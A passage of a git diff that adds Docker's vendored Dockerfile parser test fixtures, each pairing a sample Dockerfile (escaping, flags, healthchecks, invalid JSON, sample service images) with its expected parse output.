docker") +(run "useradd --create-home --gid docker unprivilegeduser") +(volume "/var/lib/docker") +(workdir "/go/src/github.com/docker/docker") +(env "DOCKER_BUILDTAGS" "apparmor selinux") +(entrypoint "hack/dind") +(copy "." "/go/src/github.com/docker/docker") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile new file mode 100644 index 0000000000..08fa18acec --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile @@ -0,0 +1,23 @@ +FROM ubuntu +ENV name value +ENV name=value +ENV name=value name2=value2 +ENV name="value value1" +ENV name=value\ value2 +ENV name="value'quote space'value2" +ENV name='value"double quote"value2' +ENV name=value\ value2 name2=value2\ value3 +ENV name="a\"b" +ENV name="a\'b" +ENV name='a\'b' +ENV name='a\'b'' +ENV name='a\"b' +ENV name="''" +# don't put anything after the next line - it must be the last line of the +# Dockerfile and it must end with \ +ENV name=value \ + name1=value1 \ + name2="value2a \ + value2b" \ + name3="value3a\n\"value3b\"" \ + name4="value4a\\nvalue4b" \ diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result new file mode 100644 index 0000000000..ba0a6dd7cb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result @@ -0,0 +1,16 @@ +(from "ubuntu") +(env "name" "value") +(env "name" "value") +(env "name" "value" "name2" "value2") +(env "name" "\"value value1\"") +(env "name" "value\\ value2") +(env "name" "\"value'quote space'value2\"") +(env "name" "'value\"double quote\"value2'") +(env "name" "value\\ value2" "name2" "value2\\ value3") +(env "name" "\"a\\\"b\"") +(env "name" "\"a\\'b\"") +(env "name" "'a\\'b'") +(env "name" "'a\\'b''") +(env "name" "'a\\\"b'") +(env "name" "\"''\"") +(env "name" "value" "name1" "value1" "name2" "\"value2a value2b\"" "name3" "\"value3a\\n\\\"value3b\\\"\"" "name4" "\"value4a\\\\nvalue4b\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile new file mode 100644 index 0000000000..6def7efdcd --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile @@ -0,0 +1,9 @@ +# Comment here. Should not be looking for the following parser directive. +# Hence the following line will be ignored, and the subsequent backslash +# continuation will be the default. +# escape = ` + +FROM image +MAINTAINER foo@bar.com +ENV GOPATH \ +\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result new file mode 100644 index 0000000000..21522a880b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result @@ -0,0 +1,3 @@ +(from "image") +(maintainer "foo@bar.com") +(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile new file mode 100644 index 0000000000..08a8cc4326 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile @@ -0,0 +1,7 @@ +# escape = `` +# There is no white space line after the directives. This still succeeds, but goes +# against best practices. +FROM image +MAINTAINER foo@bar.com +ENV GOPATH ` +\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result new file mode 100644 index 0000000000..21522a880b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result @@ -0,0 +1,3 @@ +(from "image") +(maintainer "foo@bar.com") +(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile new file mode 100644 index 0000000000..ef30414a5e --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile @@ -0,0 +1,6 @@ +#escape = ` + +FROM image +MAINTAINER foo@bar.com +ENV GOPATH ` +\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result new file mode 100644 index 0000000000..21522a880b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result @@ -0,0 +1,3 @@ +(from "image") +(maintainer "foo@bar.com") +(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile new file mode 100644 index 0000000000..1ffb17ef08 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile @@ -0,0 +1,14 @@ +FROM ubuntu:14.04 +MAINTAINER Erik \\Hollensbe \" + +RUN apt-get \update && \ + apt-get \"install znc -y +ADD \conf\\" /.znc + +RUN foo \ + +bar \ + +baz + +CMD [ "\/usr\\\"/bin/znc", "-f", "-r" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result new file mode 100644 index 0000000000..13e409cb1a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result @@ -0,0 +1,6 @@ +(from "ubuntu:14.04") +(maintainer "Erik \\\\Hollensbe \\\"") +(run "apt-get \\update && apt-get \\\"install znc -y") +(add "\\conf\\\\\"" "/.znc") +(run "foo bar baz") +(cmd "/usr\\\"/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile new file mode 100644 index 0000000000..2418e0f069 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile @@ -0,0 +1,10 @@ +FROM scratch +COPY foo /tmp/ +COPY --user=me foo /tmp/ +COPY --doit=true foo /tmp/ +COPY --user=me --doit=true foo /tmp/ +COPY --doit=true -- foo /tmp/ +COPY -- foo /tmp/ +CMD --doit [ "a", "b" ] +CMD --doit=true -- [ "a", "b" ] +CMD --doit -- [ ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result new file mode 100644 index 0000000000..4578f4cba4 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result @@ -0,0 +1,10 @@ +(from "scratch") +(copy "foo" "/tmp/") +(copy ["--user=me"] "foo" "/tmp/") +(copy ["--doit=true"] "foo" "/tmp/") +(copy ["--user=me" "--doit=true"] "foo" "/tmp/") +(copy ["--doit=true"] "foo" "/tmp/") +(copy "foo" "/tmp/") +(cmd ["--doit"] "a" "b") +(cmd ["--doit=true"] "a" "b") +(cmd ["--doit"]) diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile new file mode 100644 index 0000000000..081e442882 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile @@ -0,0 +1,10 @@ +FROM debian +ADD check.sh main.sh /app/ +CMD /app/main.sh +HEALTHCHECK +HEALTHCHECK --interval=5s --timeout=3s --retries=3 \ + CMD /app/check.sh --quiet +HEALTHCHECK CMD +HEALTHCHECK CMD a b +HEALTHCHECK --timeout=3s CMD ["foo"] +HEALTHCHECK CONNECT TCP 7000 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result new file mode 100644 index 0000000000..092924f88c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result @@ -0,0 +1,9 @@ +(from "debian") +(add "check.sh" "main.sh" "/app/") +(cmd "/app/main.sh") +(healthcheck) +(healthcheck ["--interval=5s" "--timeout=3s" "--retries=3"] "CMD" "/app/check.sh --quiet") +(healthcheck "CMD") +(healthcheck "CMD" "a b") +(healthcheck ["--timeout=3s"] "CMD" "foo") +(healthcheck "CONNECT" "TCP 7000") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile new file mode 100644 index 0000000000..587fb9b54b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile @@ -0,0 +1,15 @@ +FROM ubuntu:14.04 + +RUN apt-get update && apt-get install wget -y +RUN wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb +RUN dpkg -i influxdb_latest_amd64.deb +RUN rm -r /opt/influxdb/shared + +VOLUME /opt/influxdb/shared + +CMD /usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml + +EXPOSE 8083 +EXPOSE 8086 +EXPOSE 8090 +EXPOSE 8099 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result new file mode 100644 index 0000000000..0998e87e63 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result @@ -0,0 +1,11 @@ +(from "ubuntu:14.04") +(run "apt-get update && apt-get install wget -y") +(run "wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb") +(run "dpkg -i influxdb_latest_amd64.deb") +(run "rm -r /opt/influxdb/shared") +(volume "/opt/influxdb/shared") +(cmd "/usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml") +(expose "8083") +(expose "8086") +(expose "8090") +(expose "8099") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile new file mode 100644 index 0000000000..39fe27d99c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile @@ -0,0 +1 @@ +CMD "[\"echo\", \"Phew, I just managed to escaped those double quotes\"]" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result new file mode 100644 index 0000000000..afc220c2a7 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result @@ -0,0 +1 @@ +(cmd "\"[\\\"echo\\\", \\\"Phew, I just managed to escaped those double quotes\\\"]\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile new file mode 100644 index 0000000000..eaae081a06 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile @@ -0,0 +1 @@ +CMD '["echo", "Well, JSON in a string is JSON too?"]' diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result new file mode 100644 index 0000000000..484804e2b2 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result @@ -0,0 +1 @@ +(cmd "'[\"echo\", \"Well, JSON in a string is JSON too?\"]'") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile new file mode 100644 index 0000000000..c3ac63c07a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile @@ -0,0 +1 @@ +CMD ['echo','single quotes are invalid JSON'] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result new file mode 100644 index 0000000000..6147891207 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result @@ -0,0 +1 @@ +(cmd "['echo','single quotes are invalid JSON']") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile new file mode 100644 index 0000000000..5fd4afa522 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile @@ -0,0 +1 @@ +CMD ["echo", "Please, close the brackets when you're done" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result new file mode 100644 index 0000000000..1ffbb8ff85 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result @@ -0,0 +1 @@ +(cmd "[\"echo\", \"Please, close the brackets when you're done\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile new file mode 100644 index 0000000000..30cc4bb48f --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile @@ -0,0 +1 @@ +CMD ["echo", "look ma, no quote!] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result new file mode 100644 index 0000000000..32048147b5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result @@ -0,0 +1 @@ +(cmd "[\"echo\", \"look ma, no quote!]") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile new file mode 100644 index 0000000000..a586917110 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile @@ -0,0 +1,8 @@ +CMD [] +CMD [""] +CMD ["a"] +CMD ["a","b"] +CMD [ "a", "b" ] +CMD [ "a", "b" ] +CMD [ "a", "b" ] +CMD ["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result new file mode 100644 index 0000000000..c6553e6e1a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result @@ -0,0 +1,8 @@ +(cmd) +(cmd "") +(cmd "a") +(cmd "a" "b") +(cmd "a" "b") +(cmd "a" "b") +(cmd "a" "b") +(cmd "abc 123" "♥" "☃" "\" \\ / \b \f \n \r \t \x00") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile new file mode 100644 index 0000000000..35f9c24aa6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile @@ -0,0 +1,7 @@ +FROM ubuntu:14.04 +MAINTAINER James Turnbull "james@example.com" +ENV REFRESHED_AT 2014-06-01 +RUN apt-get update +RUN apt-get -y install redis-server redis-tools +EXPOSE 6379 +ENTRYPOINT [ "/usr/bin/redis-server" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result new file mode 100644 index 0000000000..b5ac6fe445 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result @@ -0,0 +1,7 @@ +(from "ubuntu:14.04") +(maintainer "James Turnbull \"james@example.com\"") +(env "REFRESHED_AT" "2014-06-01") +(run "apt-get update") +(run "apt-get -y install redis-server redis-tools") +(expose "6379") +(entrypoint "/usr/bin/redis-server") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile new file mode 100644 index 0000000000..188395fe83 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile @@ -0,0 +1,48 @@ +FROM busybox:buildroot-2014.02 + +MAINTAINER docker + +ONBUILD RUN ["echo", "test"] +ONBUILD RUN echo test +ONBUILD COPY . / + + +# RUN Commands \ +# linebreak in comment \ +RUN ["ls", "-la"] +RUN ["echo", "'1234'"] +RUN echo "1234" +RUN echo 1234 +RUN echo '1234' && \ + echo "456" && \ + echo 789 +RUN sh -c 'echo root:testpass \ + > /tmp/passwd' +RUN mkdir -p /test /test2 /test3/test + +# ENV \ +ENV SCUBA 1 DUBA 3 +ENV SCUBA "1 DUBA 3" + +# CMD \ +CMD ["echo", "test"] +CMD echo test +CMD echo "test" +CMD echo 'test' +CMD echo 'test' | wc - + +#EXPOSE\ +EXPOSE 3000 +EXPOSE 9000 5000 6000 + +USER docker +USER docker:root + +VOLUME ["/test"] +VOLUME ["/test", "/test2"] +VOLUME /test3 + +WORKDIR /test + +ADD . / +COPY . copy diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result new file mode 100644 index 0000000000..6f7d57a396 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result @@ -0,0 +1,29 @@ +(from "busybox:buildroot-2014.02") +(maintainer "docker ") +(onbuild (run "echo" "test")) +(onbuild (run "echo test")) +(onbuild (copy "." "/")) +(run "ls" "-la") +(run "echo" "'1234'") +(run "echo \"1234\"") +(run "echo 1234") +(run "echo '1234' && echo \"456\" && echo 789") +(run "sh -c 'echo root:testpass > /tmp/passwd'") +(run "mkdir -p /test /test2 /test3/test") +(env "SCUBA" "1 DUBA 3") +(env "SCUBA" "\"1 DUBA 3\"") +(cmd "echo" "test") +(cmd "echo test") +(cmd "echo \"test\"") +(cmd "echo 'test'") +(cmd "echo 'test' | wc -") +(expose "3000") +(expose "9000" "5000" "6000") +(user "docker") +(user "docker:root") +(volume "/test") +(volume "/test" "/test2") +(volume "/test3") +(workdir "/test") +(add "." "/") +(copy "." "copy") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile new file mode 100644 index 0000000000..f64c1168c1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile @@ -0,0 +1,16 @@ +FROM ubuntu:14.04 + +RUN apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y +ADD .muttrc / +ADD .offlineimaprc / +ADD .tmux.conf / +ADD mutt /.mutt +ADD vim /.vim +ADD vimrc /.vimrc +ADD crontab /etc/crontab +RUN chmod 644 /etc/crontab +RUN mkdir /Mail +RUN mkdir /.offlineimap +RUN echo "export TERM=screen-256color" >/.zshenv + +CMD setsid cron; tmux -2 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result new file mode 100644 index 0000000000..a0efcf04b6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result @@ -0,0 +1,14 @@ +(from "ubuntu:14.04") +(run "apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y") +(add ".muttrc" "/") +(add ".offlineimaprc" "/") +(add ".tmux.conf" "/") +(add "mutt" "/.mutt") +(add "vim" "/.vim") +(add "vimrc" "/.vimrc") +(add "crontab" "/etc/crontab") +(run "chmod 644 /etc/crontab") +(run "mkdir /Mail") +(run "mkdir /.offlineimap") +(run "echo \"export TERM=screen-256color\" >/.zshenv") +(cmd "setsid cron; tmux -2") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile new file mode 100644 index 0000000000..57bb5976a3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile @@ -0,0 +1,3 @@ +FROM foo + +VOLUME /opt/nagios/var /opt/nagios/etc /opt/nagios/libexec /var/log/apache2 /usr/share/snmp/mibs diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result new file mode 100644 index 0000000000..18dbdeeaa0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result @@ -0,0 +1,2 @@ +(from "foo") +(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile new file mode 100644 index 0000000000..5b9ec06a6c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile @@ -0,0 +1,7 @@ +FROM ubuntu:14.04 + +RUN apt-get update && apt-get install libcap2-bin mumble-server -y + +ADD ./mumble-server.ini /etc/mumble-server.ini + +CMD /usr/sbin/murmurd diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result new file mode 100644 index 0000000000..a0036a943e --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result @@ -0,0 +1,4 @@ +(from "ubuntu:14.04") +(run "apt-get update && apt-get install libcap2-bin mumble-server -y") +(add "./mumble-server.ini" "/etc/mumble-server.ini") +(cmd "/usr/sbin/murmurd") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile new file mode 100644 index 0000000000..bf8368e1ca --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile @@ -0,0 +1,14 @@ +FROM ubuntu:14.04 +MAINTAINER Erik Hollensbe + +RUN apt-get update && apt-get install nginx-full -y +RUN rm -rf /etc/nginx +ADD etc /etc/nginx +RUN chown -R root:root /etc/nginx +RUN /usr/sbin/nginx -qt +RUN mkdir /www + +CMD ["/usr/sbin/nginx"] + +VOLUME /www +EXPOSE 80 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result new file mode 100644 index 0000000000..56ddb6f258 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result @@ -0,0 +1,11 @@ +(from "ubuntu:14.04") +(maintainer "Erik Hollensbe ") +(run "apt-get update && apt-get install nginx-full -y") +(run "rm -rf /etc/nginx") +(add "etc" "/etc/nginx") +(run "chown -R root:root /etc/nginx") +(run "/usr/sbin/nginx -qt") +(run "mkdir /www") +(cmd "/usr/sbin/nginx") +(volume "/www") +(expose "80") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile new file mode 100644 index 0000000000..72b79bdd7d --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile @@ -0,0 +1,23 @@ +FROM ubuntu:12.04 + +EXPOSE 27015 +EXPOSE 27005 +EXPOSE 26901 +EXPOSE 27020 + +RUN apt-get update && apt-get install libc6-dev-i386 curl unzip -y +RUN mkdir -p /steam +RUN curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam +ADD ./script /steam/script +RUN /steam/steamcmd.sh +runscript /steam/script +RUN curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf +RUN curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf +ADD ./server.cfg /steam/tf2/tf/cfg/server.cfg +ADD ./ctf_2fort.cfg /steam/tf2/tf/cfg/ctf_2fort.cfg +ADD ./sourcemod.cfg /steam/tf2/tf/cfg/sourcemod/sourcemod.cfg +RUN rm -r /steam/tf2/tf/addons/sourcemod/configs +ADD ./configs /steam/tf2/tf/addons/sourcemod/configs +RUN mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en +RUN cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en + +CMD cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result new file mode 100644 index 0000000000..d4f94cd8be --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result @@ -0,0 +1,20 @@ +(from "ubuntu:12.04") +(expose "27015") +(expose "27005") +(expose "26901") +(expose "27020") +(run "apt-get update && apt-get install libc6-dev-i386 curl unzip -y") +(run "mkdir -p /steam") +(run "curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam") +(add "./script" "/steam/script") +(run "/steam/steamcmd.sh +runscript /steam/script") +(run "curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf") +(run "curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf") +(add "./server.cfg" "/steam/tf2/tf/cfg/server.cfg") +(add "./ctf_2fort.cfg" "/steam/tf2/tf/cfg/ctf_2fort.cfg") +(add "./sourcemod.cfg" "/steam/tf2/tf/cfg/sourcemod/sourcemod.cfg") +(run "rm -r /steam/tf2/tf/addons/sourcemod/configs") +(add "./configs" "/steam/tf2/tf/addons/sourcemod/configs") +(run "mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en") +(run "cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en") +(cmd "cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile new file mode 100644 index 0000000000..4842088166 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile @@ -0,0 +1,9 @@ +FROM ubuntu:14.04 + +RUN apt-get update -qy && apt-get install tmux zsh weechat-curses -y + +ADD .weechat /.weechat +ADD .tmux.conf / +RUN echo "export TERM=screen-256color" >/.zshenv + +CMD zsh -c weechat diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result new file mode 100644 index 0000000000..c3abb4c54f --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result @@ -0,0 +1,6 @@ +(from "ubuntu:14.04") +(run "apt-get update -qy && apt-get install tmux zsh weechat-curses -y") +(add ".weechat" "/.weechat") 